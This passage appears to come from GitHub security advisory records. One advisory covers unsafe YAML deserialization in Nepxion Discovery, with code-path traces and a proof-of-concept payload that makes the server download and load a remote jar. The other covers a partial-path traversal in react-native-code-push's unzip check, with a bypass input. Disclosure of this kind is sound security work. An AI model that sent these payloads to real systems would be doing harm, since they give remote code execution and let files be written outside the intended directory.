[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L251-L251)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doCreateVersionRelease(String group, String serviceId, <strong>String conditionStrategyYaml</strong>) {\r\n           try {\r\n               String result = strategyResource.createVersionRelease(group, serviceId, conditionStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L253-L253)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doCreateVersionRelease(String group, String serviceId, String conditionStrategyYaml) {\r\n           try {\r\n               String result = strategyResource.createVersionRelease(group, serviceId, <strong>conditionStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L108-L108)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String createVersionRelease(String group, String serviceId, <strong>String conditionStrategyYaml</strong>) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n   \r\n   </code></pre>\r\n   \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L109-L109)\r\n   <pre><code class=\"java\">    @Override\r\n       public String createVersionRelease(String group, String serviceId, String conditionStrategyYaml) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n   \r\n           return createVersionRelease(group, serviceId, conditionStrategy);\r\n   </code></pre>\r\n   \r\n7. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n           return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n       }\r\n   </code></pre>\r\n   \r\n8. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n   <pre><code class=\"java\">    @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n           return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n10. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n    <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n    \r\n            return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n        }\r\n    }</code></pre>\r\n    \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L62-L62).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L62-L62)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"全局订阅方式,根据Yaml格式,重新创建版本蓝绿灰度发布(创建链路智能编排,不创建条件表达式)\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml</strong>) {\r\n           return doRecreateVersionRelease(group, conditionRouteStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L63-L63)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; recreateVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @RequestBody @ApiParam(value = \"蓝绿灰度路由策略Yaml\", required = true) String conditionRouteStrategyYaml) {\r\n           return doRecreateVersionRelease(group, <strong>conditionRouteStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L201-L201)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doRecreateVersionRelease(String group, <strong>String conditionRouteStrategyYaml</strong>) {\r\n           try {\r\n               String result = strategyResource.recreateVersionRelease(group, conditionRouteStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L203-L203)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doRecreateVersionRelease(String group, String conditionRouteStrategyYaml) {\r\n           try {\r\n               String result = strategyResource.recreateVersionRelease(group, <strong>conditionRouteStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L81-L81)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String recreateVersionRelease(String group, <strong>String conditionRouteStrategyYaml</strong>) {\r\n           return recreateVersionRelease(group, null, conditionRouteStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L82-L82)\r\n   <pre><code class=\"java\">    @Override\r\n       public String recreateVersionRelease(String group, String conditionRouteStrategyYaml) {\r\n           return recreateVersionRelease(group, null, <strong>conditionRouteStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L126-L126)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String recreateVersionRelease(String group, String serviceId, <strong>String conditionRouteStrategyYaml</strong>) {\r\n           ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(conditionRouteStrategyYaml, ConditionRouteStrategy.class);\r\n   \r\n   </code></pre>\r\n   \r\n8. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L127-L127)\r\n   <pre><code class=\"java\">    @Override\r\n       public String recreateVersionRelease(String group, String serviceId, String conditionRouteStrategyYaml) {\r\n           ConditionRouteStrategy conditionRouteStrategy = YamlUtil.fromYaml(<strong>conditionRouteStrategyYaml</strong>, ConditionRouteStrategy.class);\r\n   \r\n           return recreateVersionRelease(group, serviceId, conditionRouteStrategy);\r\n   </code></pre>\r\n   \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n10. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n    <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n    \r\n            return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n        }\r\n    }</code></pre>\r\n    \r\n\r\n</details>\r\n\r\n----------------------------------------\r\n\r\n[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n\r\n<pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n\r\n        return <strong>snakeYaml.loadAs(yaml, clazz)</strong>;\r\n    }\r\n}</code></pre>\r\n\r\n*Unsafe deserialization depends on a [user-provided value](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L48-L48).*\r\n\r\n#### Paths\r\n\r\n<details>\r\n<summary>Path with 10 steps</summary>\r\n\r\n1. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L48-L48)\r\n   <pre><code class=\"java\">    @ApiOperation(value = \"全局订阅方式,根据Yaml格式,创建版本蓝绿灰度发布\", notes = \"\", response = ResponseEntity.class, httpMethod = \"POST\")\r\n       @ResponseBody\r\n       public ResponseEntity&lt;?&gt; createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, <strong>@RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml</strong>) {\r\n           return doCreateVersionRelease(group, conditionStrategyYaml);\r\n       }\r\n   </code></pre>\r\n   \r\n2. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L49-L49)\r\n   <pre><code class=\"java\">    @ResponseBody\r\n       public ResponseEntity&lt;?&gt; createVersionRelease(@PathVariable(value = \"group\") @ApiParam(value = \"组名\", required = true) String group, @RequestBody @ApiParam(value = \"蓝绿灰度策略Yaml\", required = true) String conditionStrategyYaml) {\r\n           return doCreateVersionRelease(group, <strong>conditionStrategyYaml</strong>);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n3. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L181-L181)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       private ResponseEntity&lt;?&gt; doCreateVersionRelease(String group, <strong>String conditionStrategyYaml</strong>) {\r\n           try {\r\n               String result = strategyResource.createVersionRelease(group, conditionStrategyYaml);\r\n   </code></pre>\r\n   \r\n4. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/endpoint/StrategyEndpoint.java#L183-L183)\r\n   <pre><code class=\"java\">    private ResponseEntity&lt;?&gt; doCreateVersionRelease(String group, String conditionStrategyYaml) {\r\n           try {\r\n               String result = strategyResource.createVersionRelease(group, <strong>conditionStrategyYaml</strong>);\r\n   \r\n               return ResponseUtil.getSuccessResponse(result);\r\n   </code></pre>\r\n   \r\n5. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L69-L69)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public String createVersionRelease(String group, <strong>String conditionStrategyYaml</strong>) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(conditionStrategyYaml);\r\n   \r\n   </code></pre>\r\n   \r\n6. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L70-L70)\r\n   <pre><code class=\"java\">    @Override\r\n       public String createVersionRelease(String group, String conditionStrategyYaml) {\r\n           ConditionStrategy conditionStrategy = deparseVersionReleaseYaml(<strong>conditionStrategyYaml</strong>);\r\n   \r\n           return createVersionRelease(group, conditionStrategy);\r\n   </code></pre>\r\n   \r\n7. [discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L197-L197)\r\n   <pre><code class=\"java\">\r\n       @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(<strong>String conditionStrategyYaml</strong>) {\r\n           return YamlUtil.fromYaml(conditionStrategyYaml, ConditionStrategy.class);\r\n       }\r\n   </code></pre>\r\n   \r\n8. 
[discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-console/discovery-console-starter/src/main/java/com/nepxion/discovery/console/resource/StrategyResourceImpl.java#L198-L198)\r\n   <pre><code class=\"java\">    @Override\r\n       public ConditionStrategy deparseVersionReleaseYaml(String conditionStrategyYaml) {\r\n           return YamlUtil.fromYaml(<strong>conditionStrategyYaml</strong>, ConditionStrategy.class);\r\n       }\r\n   \r\n   </code></pre>\r\n   \r\n9. [discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L46-L46)\r\n   <pre><code class=\"java\">    }\r\n   \r\n       public static &lt;T&gt; T fromYaml(<strong>String yaml</strong>, Class&lt;T&gt; clazz) {\r\n           // 非线程安全\r\n           Yaml snakeYaml = new Yaml();\r\n   </code></pre>\r\n   \r\n10. 
[discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java](https://github.com/Nepxion/Discovery/blob/3d7936828df6f1242882ec1363908355eb633779/discovery-commons/discovery-common/src/main/java/com/nepxion/discovery/common/util/YamlUtil.java#L50-L50)\r\n    <pre><code class=\"java\">        Yaml snakeYaml = new Yaml();\r\n    \r\n            return snakeYaml.loadAs(<strong>yaml</strong>, clazz);\r\n        }\r\n    }</code></pre>\r\n    \r\n\r\n</details>\r\n\r\n#### Proof of Concept\r\n\r\nSend the following payload to `http://127.0.0.1:9628/strategy/deparse-version-release-yaml`.\r\n\r\n```yaml\r\n!!com.nepxion.discovery.common.entity.ConditionStrategy:\r\n    service: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:8080/yaml-payload.jar\"]]]]\r\n    blueGreen:\r\n    gray:\r\n    header:\r\n    sort:\r\n```\r\n\r\nThis will cause discovery to download the jar hosted at `http://localhost:8080` (generated using [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload)) and attempt to service load an instance of the `javax.script.ScriptEngineFactory`.\r\n\r\n----------------------------------------\r\n\r\n### Patches\r\n_Has the problem been patched? 
What versions should users upgrade to?_\r\n\r\n### Workarounds\r\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\r\n\r\n### References\r\n - https://github.com/mbechler/marshalsec/tree/master", "severity": "critical", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": 
"https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-22cq-8f5q-p5g2", "type": "GHSA" }, { "value": "CVE-2022-1471", "type": "CVE" } ], "state": "published", "created_at": "2022-12-12T18:16:25Z", "updated_at": "2023-02-02T19:48:29Z", "published_at": "2023-02-02T19:48:29Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.nepxion:discovery-common" }, "vulnerable_version_range": "< 6.20.0", "patched_versions": "6.20.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "score": 10.0 }, "cwes": [ { "cwe_id": "CWE-20", "name": "Improper Input Validation" }, { "cwe_id": "CWE-77", "name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')" }, { "cwe_id": "CWE-502", "name": "Deserialization of Untrusted Data" } ], "cwe_ids": [ "CWE-20", "CWE-77", "CWE-502" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" }, { "login": "jorgectf", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": 
"https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" }, { "user": { "login": "jorgectf", "id": 46056498, "node_id": "MDQ6VXNlcjQ2MDU2NDk4", "avatar_url": "https://avatars.githubusercontent.com/u/46056498?v=4", "gravatar_id": "", "url": "https://api.github.com/users/jorgectf", "html_url": "https://github.com/jorgectf", "followers_url": "https://api.github.com/users/jorgectf/followers", "following_url": "https://api.github.com/users/jorgectf/following{/other_user}", "gists_url": "https://api.github.com/users/jorgectf/gists{/gist_id}", "starred_url": "https://api.github.com/users/jorgectf/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/jorgectf/subscriptions", "organizations_url": "https://api.github.com/users/jorgectf/orgs", "repos_url": "https://api.github.com/users/jorgectf/repos", "events_url": "https://api.github.com/users/jorgectf/events{/privacy}", "received_events_url": "https://api.github.com/users/jorgectf/received_events", "type": "User", "site_admin": true }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7hfp-mpq6-2jhf", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7hfp-mpq6-2jhf", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7hfp-mpq6-2jhf", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Partial-Path Traversal') during unzip in react-native-code-push", "description": "### Impact\r\n\r\nPartial-path traversal vulnerability allows zip files downloaded as a part of the `com.microsoft.codepush.react.CodePushNativeModule#downloadUpdate` to write their contents out of the intended desintination 
directory `/unzipped`.\r\n\r\nThis bug can lead to two potential issues:\r\n - Arbitrarily written files to sibling directories of the `/unzipped` directories like `/unzipped-private`\r\n - DOS of the host system by filling the disk space of the drive as these files written outside the `/unzipped` directories will never be cleaned up.\r\n\r\nThe `downloadUpdate` method, although written in Java, is exposed as a react-native method, and is invoked from Javascript code.\r\n\r\n#### Vulnerability Root Cause\r\n\r\nThe `com.microsoft.codepush.react.FileUtils#unzipFile` contains a partial-path traversal vulnerability in the logic used to unzip a zip file. This is due to the `com.microsoft.codepush.react.FileUtils#validateFileName` method containing an insufficient guard against partial-path traversal vulnerabilities.\r\n\r\n ```java\r\n    private static String validateFileName(String fileName, File destinationFolder) throws IOException {\r\n        String destinationFolderCanonicalPath = destinationFolder.getCanonicalPath();\r\n\r\n        File file = new File(destinationFolderCanonicalPath, fileName);\r\n        String canonicalPath = file.getCanonicalPath();\r\n\r\n        if (!canonicalPath.startsWith(destinationFolderCanonicalPath)) {\r\n            throw new IllegalStateException(\"File is outside extraction target directory.\");\r\n        }\r\n\r\n        return canonicalPath;\r\n    }\r\n ```\r\n\\- https://github.com/microsoft/react-native-code-push/blob/f72751fbc044e8348bda82c52b784d29952e06dd/android/app/src/main/java/com/microsoft/codepush/react/FileUtils.java#L126-L137\r\n\r\nThe application controls the `destinationFolder` argument, which will always be a directory ending in `/unzipped`, but the `fileName` comes from the untrusted Zip file. 
The above bit of logic can be bypassed with the following payloads:\r\n\r\n```java\r\n// The following will return the string \"[SOME PARENT PATH]/unzipped-private/foo-bar\"\r\nvalidateFileName(\"/../unzipped-private/foo-bar\", new File(\"[SOME PARENT PATH]/unzipped\"))\r\n```\r\n\r\n#### True Root cause\r\n\r\n> If the result of `parent.getCanonicalPath()` is not slash terminated it allows for partial path traversal.\r\n>\r\n> Consider `\"/usr/outnot\".startsWith(\"/usr/out\")`. The check is bypassed although `outnot` is not under the `out` directory.\r\nThe terminating slash may be removed in various places. On Linux `println(new File(\"/var/\"))` returns `/var`, but `println(new File(\"/var\", \"/\"))` - `/var/`, however `println(new File(\"/var\", \"/\").getCanonicalPath())` - `/var`.\r\n> \\- [@JarLob (Jaroslav Lobačevski)](https://github.com/JarLob)\r\n\r\n### Patches\r\n\r\nNone\r\n\r\n### Workarounds\r\n\r\nNone\r\n\r\n### References\r\n\r\nSimilar vulnerabilities:\r\n - ESAPI (The OWASP Enterprise Security API) - https://nvd.nist.gov/vuln/detail/CVE-2022-23457\r\n\r\n### Response from Microsoft\r\n\r\n> VULN-066991 CRM:0765000224\r\n>\r\n> Hello,\r\n>\r\n> Thank you for contacting the Microsoft Security Response Center (MSRC). We appreciate the time taken to submit this assessment.\r\n> \r\n> Upon investigation, we have determined that this submission does not meet the definition of a security vulnerability for servicing. This report does not appear to identify a weakness in a Microsoft product or service that would enable an attacker to compromise the integrity, availability, or confidentiality of a Microsoft offering. \r\n> \r\n> As such, this thread is being closed and no longer monitored. 
We apologize for any inconvenience this may have caused.\r\n> \r\n> If you believe this determination to be in error, submit a new report at https://aka.ms/secure-at\r\n> \r\n> Please include:\r\n> \r\n> Relevant information previously provided in your initial report\r\n> Detailed steps required to consistently reproduce the issue\r\n> Short explanation on how an attacker could use the information to exploit another user remotely\r\n> Proof-of-concept (POC), such as a video recording, crash reports, screenshots, or relevant code samples\r\n> \r\n> More information on reporting a security vulnerability can be found at [https://www.microsoft.com/msrc/faqs-report-an-issue](https://www.microsoft.com/en-us/msrc/faqs-report-an-issue?rtc=1).\r\n> \r\n> Regards,\r\n> \r\n> Ali \r\n> MSRC\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": 